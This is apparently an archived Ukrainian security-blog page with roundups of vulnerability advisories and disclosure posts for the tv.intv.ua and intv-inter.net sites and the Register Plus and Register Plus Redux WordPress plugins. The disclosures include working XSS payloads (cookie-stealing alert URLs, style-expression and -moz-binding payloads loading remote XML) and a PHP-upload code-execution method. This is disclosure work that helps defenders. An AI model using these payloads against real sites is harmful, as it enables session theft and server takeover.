Архів для категорії 'Уразливості'

Добірка уразливостей

17:24 31.01.2012

В даній добірці уразливості в веб додатках:

  • HP OpenView NNM ov.dll _OVBuildPath Remote Code Execution Vulnerability (деталі)
  • Solutiontech (product.php?cat_id) Remote SQL injection Vulnerability (деталі)
  • Zones Web Solution (status.asp?print) (search_result.php?loc_id) Remote SQL injection Vulnerabilities (деталі)
  • HP OpenView NNM webappmon.exe parameter Remote Code Execution Vulnerability (деталі)
  • Web Fusion Nepal (tour.php?category) XSS Vulnerability (деталі)
  • Avon Groups (search_result.php?cid) Remote SQL injection Vulnerability (деталі)
  • HP OpenView NNM nnmRptConfig.exe nameParams Remote Code Execution Vulnerability (деталі)
  • Web Fusion Nepal (find.php?id) Remote SQL injection Vulnerability (деталі)
  • Infocus Web Solutions (news_desc.php?id) Remote SQL injection Vulnerability (деталі)
  • A1 Solutions (cat_sell.php?cid) Remote SQL injection Vulnerability (деталі)

Добірка уразливостей

17:28 30.01.2012

В даній добірці уразливості в веб додатках:

  • Dovecot vulnerability (деталі)
  • typo3-src security update (деталі)
  • Mambo CMS 4.6.x (4.6.5) | SQL Injection (деталі)
  • SQL injection vulnerability in colord (деталі)
  • FootBall Cms (view_table_lig.php?group) XSS Vulnerability (деталі)
  • Coherendz (products.php?cat_id) Remote SQL injection Vulnerability (деталі)
  • TrendMicro Control Manager CmdProcessor.exe AddTask Remote Code Execution Vulnerability (деталі)
  • WOC Consulting (search_result.php?cid) Remote SQL injection Vulnerability (деталі)
  • Canoy Softwares (search_result.php?loc_id) Remote SQL injection Vulnerability (деталі)
  • Zones Web Solution (StoneDetails.php?stone) XSS Vulnerability (деталі)

Уразливості на tv.intv.ua

17:10 28.01.2012

26.06.2009

Сьогодні я знайшов Cross-Site Scripting уразливості на сайті http://tv.intv.ua (це новий домен проекту http://intv-inter.net, при цьому сайт використовує обидва домени). Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на intv-inter.net.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

28.01.2012

XSS (в IE при кліку на “Додати в обране”):

http://tv.intv.ua/tv/channel/intv/?id=570507&pid=823');alert(document.cookie);//
http://tv.intv.ua/tv/channel/intv/?id=570507');alert(document.cookie);//

Дані уразливості вже виправлені шляхом заміни движка сайта. Змінили один дірявий движок на інший дірявий (про уразливості в DLE я вже писав неодноразово).

Добірка уразливостей

17:13 27.01.2012

В даній добірці уразливості в веб додатках:

  • Clickjacking attacks in SquirrelMail (деталі)
  • HP SiteScope, Remote Cross Site Scripting (XSS) and Session Fixation Attack (деталі)
  • Vulnerabilities in Samba Web Administration Tool (SWAT) (деталі)
  • phpmyadmin security update (деталі)
  • SQL injection vulnerability in HP Network Automation (деталі)
  • Sitecore CMS 6.4 Open URL Redirect Vulnerability (деталі)
  • Agent Image (news_details.php?news_ID) Remote SQL injection Vulnerability (деталі)
  • Cross-site scripting (XSS) vulnerability in HP Network Automation (деталі)
  • G2webCMS (products.php?cat_id) (member-profile.php?profile) Remote SQL injection Vulnerability (деталі)
  • iCube Lab (product_details.php?cat_id) Remote SQL injection Vulnerability (деталі)

Нові уразливості в Register Plus для WordPress

17:16 26.01.2012

06.12.2011

Нещодавно, 25.11.2011, коли я виявив нові уразливості в Register Plus Redux, я також знайшов нові уразливості в плагіні Register Plus для WordPress. Це Cross-Site Scripting, Code Execution та Full path disclosure уразливості. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в Register Plus для WordPress.

Детальна інформація про уразливості з’явиться пізніше.

26.01.2012

XSS:

Використовуючи функцію Autocomplete URL можна провести атаку через GET:

http://site/wp-login.php?action=register&firstname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-login.php?action=register&lastname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-login.php?action=register&website=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-login.php?action=register&aim=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-login.php?action=register&yahoo=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-login.php?action=register&jabber=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-login.php?action=register&about=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-login.php?action=register&regcode=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливі всі ті параметри, що і при POST запиті. Про які я розповідав раніше.

XSS (persistent):

Вказавши XSS код в якості імені файла (наприклад, можна створити такий файл на Linux та Unix системах) та завантаживши його, код викнається на сторінках http://site/wp-admin/options-general.php?page=register-plus та http://site/wp-login.php?action=register.

Code Execution:

Маючи доступ до налаштувань плагіна, можна провести Code Execution (в полі Custom Logo) через аплоадінг файла з довільний розширенням (наприклад, PHP). Для атаки можна просто завантажити 1.php (на відміну від Register Plus Redux, де це неможливо і потрібно використовувати обхідні техніки). Це пов’язано з тим, що використовується власний аплоадер, а не вбудований в WordPress.

Full path disclosure:

При включеній опції плагіна “Enable Invitation Tracking Dashboard Widget” на сторінці http://site/wp-admin/index.php виводиться повний шлях на сервері.

Уразливі Register Plus 3.5.1 та попередні версії. Враховуючи, що даний плагін більше не підтримується розробником, то його користувачам потрібно виправити дірки власноруч. Або оновити цей плагін до версії Register Plus Redux з виправленими уразливостями.

Добірка уразливостей

16:30 25.01.2012

В даній добірці уразливості в веб додатках:

  • Security Notice for CA SiteMinder (деталі)
  • Chezola Systems (display-section.php?id) Remote SQL injection Vulnerability (деталі)
  • EasyContent CMS (participant.php?id) Remote SQL injection Vulnerability (деталі)
  • NetSaro Enterprise Messenger Server Plaintext Password Storage Vulnerability (деталі)
  • Multiple cross-site request forgery (CSRF) vulnerabilities in SquirrelMail (деталі)
  • CRLF injection vulnerability in SquirrelMail (деталі)
  • NetSaro Enterprise Messenger Server Administration Console Weak Cryptographic Password Storage Vulnerability (деталі)
  • Cross-site scripting (XSS) vulnerability in Adobe RoboHelp and RoboHelp Server (деталі)
  • Cross-site scripting (XSS) vulnerability in SquirrelMail (деталі)
  • Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail (деталі)

Нові уразливості на intv-inter.net

20:06 24.01.2012

05.06.2009

У вересні, 21.09.2008, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості на сайті http://intv-inter.net. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на intv-inter.net.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

24.01.2012

Insufficient Anti-automation:

Вразлива капча на сторінках сайта (http://intv-inter.net/tv/channel/intv/).

XSS (IE):

http://intv-inter.net/login/?redirect='style=xss:expression(alert(document.cookie))%20

Дані уразливості вже виправлені шляхом заміни движка сайта. Змінили один дірявий движок на інший дірявий (про уразливості в DLE я вже писав неодноразово).

Добірка уразливостей

15:22 23.01.2012

В даній добірці уразливості в веб додатках:

  • Vulnerabilities in Siemens Automation License Manager (деталі)
  • Avant-Garde Technologies (display-section.php?id) Remote SQL injection Vulnerability (деталі)
  • Liberating IT (picture.php?gid) Remote SQL injection Vulnerability (деталі)
  • Vulnerabilities in Siemens SIMATIC WinCC flexible 2008 SP2 (деталі)
  • Amigot Corp (story.php?id) Remote SQL injection Vulnerability (деталі)
  • Vulnerabilities in Serv-U 11.1.0.3 (деталі)
  • 6House Design (product_details.php?id) Remote SQL injection Vulnerability (деталі)
  • Webdesigns-studio (sysMsg.php?errMsg) Cross Site Scripting Vulnerabilities (деталі)
  • Mybb Change Password Vulnerability (деталі)
  • Advanced Login <= 0.7 (root) Remote File Inclusion Vulnerability (деталі)

Уразливості в плагінах для WordPress №56

22:45 31.12.2011

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Skysa App Bar, 1 jquery photo gallery slideshow flash та Flash album gallery. Для котрих з’явилися експлоіти. Skysa App Bar - це плагін для розширення сайту за рахунок розміщення веб додатків на панелі, 1 jquery photo gallery slideshow flash - це плагін для створення фотогалереї, Flash album gallery - це також плагін для створення фотогалереї.

  • Wordpress skysa-official plugin Cross-Site Scripting Vulnerabilities (деталі)
  • Wordpress 1-jquery-photo-gallery-slideshow-flash plugin Cross-Site Scripting Vulnerabilities (деталі)
  • Wordpress flash-album-gallery plugin Cross-Site Scripting Vulnerabilities (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

XSS та IAA уразливості в Register Plus Redux для WordPress

17:21 31.12.2011

01.12.2011

Нещодавно, 25.11.2011, я знайшов 36 уразливостей в плагіні Register Plus Redux для WordPress. Перевірялася остання версія плагіна. Це друга з серії публікацій про нові дірки в даному плагіні. В якій я розповім про Cross-Site Scripting та Insufficient Anti-automation уразливості. Про що вже повідомив розробникам.

Раніше я вже писав про уразливості в Register Plus Redux для WordPress.

Детальна інформація про уразливості з’явиться пізніше.

31.12.2011

Persistent XSS:

На сторінці http://site/wp-admin/options-general.php ?page=register-plus-redux є наступні уразливості.

В полях: Email Verification, Admin Verification, User Message (якщо включений Custom New User Message), User Message (якщо включений Custom Verification Message), Admin Message (якщо включений Custom Admin Notification), Custom Register CSS, Custom Login CSS:
</textarea><script>alert(document.cookie)</script>
Код спрацює на сторінці http://site/wp-admin/options-general.php?page=register-plus-redux, а у випадку полей Email Verification і Admin Verification ще спрацює на сторінці http://site/wp-login.php?checkemail=registered.

Якщо вказати код в полях Custom Register CSS, Custom Login CSS:

body {-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml#xss)}

То код відповідно спрацює на сторінках http://site/wp-login.php?action=register та http://site/wp-login.php. Код спрацює в Firefox < 3.0, але якщо розмістити xml-файл на цьому ж сайті (через аплоадер), то можна буде атакувати й Firefox 3.0 і вище. А якщо вказати код з використанням expression, javascript або vbscript в стилях, то він виконається в IE.

Якщо вказати код в полі Minimum password length (в User Set Password) при включених опціях Require new users enter a password during registration та Show password strength meter:
1){}};alert(document.cookie);function a(){if(1==1
То код спрацює на сторінці http://site1/wp-login.php?action=register.

Якщо вказати код в полях Empty, Short, Bad, Good, Strong, Mismatch (в User Set Password) при включених опціях Require new users enter a password during registration та Show password strength meter:
"};alert(document.cookie);/*
То код спрацює на сторінці http://site/wp-login.php?action=register.

Якщо вказати код в полі Required Fields Style Rules:
-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml#xss)
То код спрацює на сторінці http://site/wp-login.php?action=register. Код спрацює в Firefox < 3.0, але якщо розмістити xml-файл на цьому ж сайті (через аплоадер), то можна буде атакувати й Firefox 3.0 і вище. А якщо вказати код з використанням expression, javascript або vbscript в стилях, то він виконається в IE.

Strictly Social XSS persistent:

У вищезгаданих полях User Message (якщо включений Custom New User Message), User Message (якщо включений Custom Verification Message), Admin Message (якщо включений Custom Admin Notification) окрім XSS в самому полі, є ще XSS через візуалізацію (що відбувається через jQuery), і відповідно при відправці POST запиту код спрацює двічі, й виправляти кожну з цих уразливостей потрібно в двох місцях (бо навіть заескейпчений html-код виконається). Також, окрім атаки через відправку POST запиту, можна провести XSS атаку через візуалізацію в цих трьох полях, а також в девяти інших полях (From Email, From Name, Subject в Custom New User Message, в Custom Verification Message та в Custom Admin Notification) при вставці XSS коду в поле.

Тобто потрібно обманним чином змусити жертву вставити код в одне з цих дванадцяти полів, при цьому код можна занести жертві в буфер через атаку через буфер обміну. Дані уразливості - це Strictly social XSS.

Insufficient Anti-automation:

http://site/wp-login.php?action=register

В формі реєстрації немає захисту від автоматизованих запитів (капчі). Як і в попередніх версіях плагіну.

Уразливі Register Plus Redux v3.7.3.1 та попередні версії. На замовлення мого клієнта я розробив нову версію плагіна з виправленними усіма знайденними мною уразливостями. Тому всі користувачі цього плагіна можуть знайти нову й безпечну версію плагіна в Інтернеті.